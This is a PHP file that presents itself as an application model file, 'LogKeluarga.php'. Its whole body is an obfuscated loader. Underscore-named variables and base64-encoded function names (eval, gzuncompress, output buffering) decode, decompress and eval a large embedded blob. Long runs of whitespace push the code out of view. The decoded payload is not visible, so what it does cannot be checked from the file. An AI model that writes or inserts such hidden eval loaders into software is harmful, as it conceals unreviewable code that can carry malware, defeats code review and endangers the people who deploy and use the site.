<?php 
        $__='printf';$_='Loading app/Models/LogKeluarga.php';
        











































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































                                                                                                                                                                                                                     $________;
